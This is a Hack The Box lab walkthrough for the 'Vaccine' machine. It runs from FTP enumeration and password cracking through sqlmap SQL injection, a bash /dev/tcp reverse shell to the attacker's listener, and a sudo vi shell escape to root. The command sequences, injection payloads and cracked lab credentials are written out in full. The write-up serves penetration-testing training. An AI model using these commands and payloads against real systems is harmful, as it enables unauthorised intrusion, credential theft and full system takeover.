---
sidebar_position: 3
sidebar_label: 🏥 Vaccine
description: ''
last_update:
  date: 2022/06/14
  author: Raúl Sánchez
tags:
  - FTP
  - Jhon the ripper
  - zip2jhon
  - hashcat
  - SQLmap
  - Cookies Hacking
  - netcat
  - GTFO - sudo
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Vaccine

## 0. Start the machine

To start machine, Just click "Spawn Machine".

![Spawn Vaccine Machine.](vaccine1.png)

Then you can see the **IP** address for that machine. In this case the machine has the IP `10.129.95.174`. Before going to enumeration steps we can simply ping to the IP address and check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 10.129.95.174
PING 10.129.95.174 (10.129.95.174) 56(84) bytes of data.
64 bytes from 10.129.95.174: icmp_seq=1 ttl=63 time=57.9 ms

--- 10.129.95.174 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 57.931/57.931/57.931/0.000 ms
```

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## 1. Enumeration

The first thing to do is to identify which operating system you are using. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool to find out.

```python
❯ whichSystem.py 10.129.95.174

10.129.95.174 (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

### 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
* \-sC : performs a script scan using the default set of scripts.

```python
❯ nmap -sV -sC 10.129.95.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 15:16 CEST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 95.97% done; ETC: 15:17 (0:00:00 remaining)
Nmap scan report for 10.129.95.174
Host is up (0.077s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.145
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.20 seconds
```

As we see, there are three open ports. First 21/tcp corresponds to [ftp](https://en.wikipedia.org/wiki/File\_Transfer\_Protocol), then port 22/tcp is [ssh](https://www.ssh.com/) and finally, port 80/tcp is running a http server with [Apache](https://apache.org) in Ubuntu.

:::note
The **File Transfer Protocol** is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network.

The **Secure Shell Protocol** is a cryptographic network protocol for operating network services securely over an unsecured network.
:::

### 1.2 Anonymous login

Now we are going to try to connect with `ftp` using the `anonymous` user. And then, we download the `backup.zip` file.

```python
❯ ftp 10.129.95.174
Connected to 10.129.95.174.
220 (vsFTPd 3.0.3)
Name (10.129.95.174:raul): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||10846|)
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10025|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |********************************************|  2533        1.72 MiB/s    00:00 ETA
226 Transfer complete.
2533 bytes received in 00:00 (47.78 KiB/s)
ftp> bye
221 Goodbye.
```

We will try to `unzip` it with the command unzip but we don't know the password.

```shell
❯ ls
backup.zip
❯ unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password: 
password incorrect--reenter: 
password incorrect--reenter:
```

### 1.3 Jhon the ripper

In order to successfully crack the password, we will have to convert the `ZIP` into the `hash` using the `zip2john`, we can will se the content of the file.

```bash
❯ zip2john backup.zip > hashes
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

❯ ls
backup.zip  hashes
❯ cat hashes
───────┬─────────────────────────────────────────────────────────────────────────────────
       │ File: hashes
       │ Size: 2.2 KB
───────┼─────────────────────────────────────────────────────────────────────────────────
       │ backup.zip:$pkzip$2*1*1*0*8*24*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b
       │ <HASHES TOO LONG>
       │ e369fd6e87d677a1fe91c0d0155fd237bfd2dc49*$/pkzip$::backup.zip:style.css, index.p
       │ hp:backup.zip
───────┴─────────────────────────────────────────────────────────────────────────────────
```

After that, we can crack the hashes with [`jhon`](https://www.openwall.com/john/).

```bash
❯ john -wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (backup.zip)     
1g 0:00:00:00 DONE (2022-06-14 15:20) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

❯ john --show hashes
backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

1 password hash cracked, 0 left
```

Now we can extract the files with the password `741852963`.

```bash
❯ unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password: 
  inflating: index.php               
  inflating: style.css  
               
❯ ls
backup.zip  hashes  index.php  style.css

❯ cat index.php
<!DOCTYPE html>
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
```

We can see the credentials of `admin:2cb42f8734ea607eefed3b70af13bbd3` , which we might be able to use. But the password seems hashed. So we will put the hash in a text file and then crack it with [`hashcat`](https://hashcat.net/hashcat/).

```bash
❯ echo 2cb42f8734ea607eefed3b70af13bbd3 > hash

❯ hashcat -a 0 -m hash /usr/share/wordlists/rockyou.txt
The specified parameter cannot use 'hash' as a value - must be a number.

❯ hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting

OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-AMD Ryzen

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

2cb42f8734ea607eefed3b70af13bbd3:qwerty789                
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started.....: Tue Jun 14 15:23:40 2022 (0 secs)
Time.Estimated...: Tue Jun 14 15:23:40 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1063.4 kH/s (0.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 102400/14344385 (0.71%)
Rejected.........: 0/102400 (0.00%)
Restore.Point....: 98304/14344385 (0.69%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Dominic1 -> birth
Hardware.Mon.#1..: Temp: 55c Util: 28%

Started: Tue Jun 14 15:23:02 2022
Stopped: Tue Jun 14 15:23:41 2022
```

We see that `Hashcat` cracked the password: **`qwerty789`**

### 1.4 Web

We can see the login page, we are going to try to login with the `admin` credentials.

![Log in to the web of the target.](vaccine2.png)

We are in! And we see something like a database...

![Admin Dashboard.](vaccine3.png)

## 2. Foothold

### 2.1 SQLmap

> `SQLmap` is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection. SQL Injection attacks can take control of databases that utilize SQL.

To use [sqlmap](https://sqlmap.org/) we need to provide a `url` and a `cookie` so to grab the cookie we can use a Firefox extension called [cookie-editor](https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/).

![Copy the value of your cookie.](vaccine4.png)

Using sqlmap we can observe that `GET parameter 'search' is vulnerable`.

```python
❯ sqlmap -u 'http://10.129.95.174/dashboard.php?search=any+query' --cookie="PHPSESSID=rblgqih6roplm5q1kla1hi6d9e"
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.5#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:30:50 /2022-06-14/

[15:30:50] [INFO] testing connection to the target URL
[15:30:51] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:30:51] [INFO] testing if the target URL content is stable
[15:30:51] [INFO] target URL content is stable
[15:30:51] [INFO] testing if GET parameter 'search' is dynamic
[15:30:51] [WARNING] GET parameter 'search' does not appear to be dynamic
[15:30:51] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[15:30:52] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] 
[15:31:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:31:44] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:31:44] [INFO] testing 'Generic inline queries'
[15:31:44] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[15:31:45] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable 
[15:31:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:31:45] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[15:31:45] [INFO] testing 'PostgreSQL inline queries'
[15:31:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:31:45] [WARNING] time-based comparison requires larger statistical model, please wait..... (done)
[15:31:56] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[15:31:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:32:06] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable 
[15:32:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=any query' AND (SELECT (CASE WHEN (3581=3581) THEN NULL ELSE CAST((CHR(72)||CHR(105)||CHR(106)||CHR(113)) AS NUMERIC) END)) IS NULL-- llNI

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=any query' AND 5685=CAST((CHR(113)||CHR(107)||CHR(112)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5685=5685) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(113)||CHR(98)||CHR(113)) AS NUMERIC)-- ZgUY

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=any query';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=any query' AND 7088=(SELECT 7088 FROM PG_SLEEP(5))-- HAZC
---
[15:32:19] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL

[*] ending @ 15:32:20 /2022-06-14/
```

Knowing that, we are going to provide the `--os-shell` flag, to be able to perform command injection and `--random-agent` to solve some errors.

```python
❯ sqlmap -u 'http://10.129.95.174/dashboard.php?search=any+query' --cookie="PHPSESSID=rblgqih6roplm5q1kla1hi6d9e" --os-shell --random-agent
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.5#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:45:12 /2022-06-14/

[15:45:12] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.53' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[15:45:12] [INFO] resuming back-end DBMS 'postgresql' 
[15:45:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=any query' AND (SELECT (CASE WHEN (3581=3581) THEN NULL ELSE CAST((CHR(72)||CHR(105)||CHR(106)||CHR(113)) AS NUMERIC) END)) IS NULL-- llNI

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=any query' AND 5685=CAST((CHR(113)||CHR(107)||CHR(112)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5685=5685) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(113)||CHR(98)||CHR(113)) AS NUMERIC)-- ZgUY

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=any query';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=any query' AND 7088=(SELECT 7088 FROM PG_SLEEP(5))-- HAZC
---
[15:45:13] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[15:45:13] [INFO] fingerprinting the back-end DBMS operating system
[15:45:13] [INFO] the back-end DBMS operating system is Linux
[15:45:13] [INFO] testing if current user is DBA
[15:45:14] [INFO] retrieved: '1'
[15:45:14] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[15:45:14] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
```

### 2.2 Netcat

We got the shell, but to make it much stable, first we will turn on the `netcat` listener on port 443.

```bash
# Allow connections from the target to your port 443
❯ sudo ufw allow from 10.129.95.174 proto tcp to any port 443
Rule added

# Start the listener
❯ sudo nc -lvnp 443
listening on [any] 443 ...
```

Then we will execute the payload on the target.

```python
os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.145/443 0>&1"
do you want to retrieve the command standard output? [Y/n/a] Y
```

We will see a connection on our listener.

```python
connect to [10.10.14.145] from (UNKNOWN) [10.129.95.174] 56276
bash: cannot set terminal process group (2007): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ whoami

postgres
```

Taking a look at the `/var/www/html` directory we can see some interesting files.

```shell
postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html  
cd /var/www/html
postgres@vaccine:/var/www/html$ ls
ls
bg.png
dashboard.css
dashboard.js
dashboard.php
index.php
license.txt
style.css
```

Using the cat command to see the content of the file `dashboard.php` and grep to use regular expressions we will find the credentials of the user `postgres`.

```php
postgres@vaccine:/var/www/html$ cat dashboard.php | grep password

$conn = pg_connect("host=localhost port=5432 user=postgres password=P@s5w0rd!");
```

### 2.3 SSH

We can connect with the target with ssh using the credentials of the user `postgres`. We can find the user flag in the home directory of this user.

```bash
❯ ssh postgres@10.129.95.174
postgres@10.129.95.174's password: P@s5w0rd!
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 14 Jun 2022 02:37:59 PM UTC

  System load:  0.0               Processes:             188
  Usage of /:   32.6% of 8.73GB   Users logged in:       0
  Memory usage: 19%               IP address for ens160: 10.129.95.174
  Swap usage:   0%


0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings


Last login: Tue Jun 14 13:49:13 2022 from 10.10.14.145
postgres@vaccine:~$ ls
11  user.txt
postgres@vaccine:~$ cat user.txt
```

We will type the the following command to see what privileges do we have.

```bash
postgres@vaccine:~$ sudo -l
[sudo] password for postgres: 
Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
```

As we see, we have `sudo` privileges to edit the `pg_hba.conf` file using `vi` by running `sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf` .

### 2.4 Privilege Escalation

We will go to [GTFOBins](https://gtfobins.github.io/gtfobins/vi/#sudo) to see if we can abuse this privilege. But we are unable to execute the following command because `sudo` is restricted to only `/bin/vi /etc/postgresql/11/main/pg_hba.conf` .

```bash
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf -c ':!/bin/sh'
Sorry, user postgres is not allowed to execute '/bin/vi /etc/postgresql/11/main/pg_hba.conf -c :!/bin/sh' as root on vaccine.
```

Other alternative is to open the file that we can and open the shell as root there.

```bash
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
```

Now we have opened vi editor as sudo, so press the **`:`** button to set the instructions inside `Vi`

```vim
:set shell=/bin/sh
```

Finally, we will open up the same  interface and type the following instruction to get a `root` shell.

```vim
:shell
[No write since last change]

# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
```

Now we can find the `root` flag in the **`/root`** directory.

```bash
# cd /root
# ls
pg_hba.conf  root.txt  snap
# cat root.txt
```
